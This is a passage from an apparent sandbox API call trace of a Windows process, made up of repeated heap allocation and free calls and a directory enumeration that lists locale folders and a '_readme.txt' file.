dwFlags=0x0, lpMem=0x31ef310 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef040 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4c8 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8b0 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef770 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0090.692] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.692] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.692] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0090.692] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.692] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.692] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef770 [0090.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.693] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0090.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 [0090.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.693] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0090.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.693] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0090.694] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.694] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.694] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.694] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.694] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.694] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa31cf920, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.694] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa31cf920, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.694] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.694] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.694] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9c8 | out: hHeap=0x680000) returned 1 [0090.694] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9c8 [0090.694] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.695] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.695] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.696] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.696] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.704] 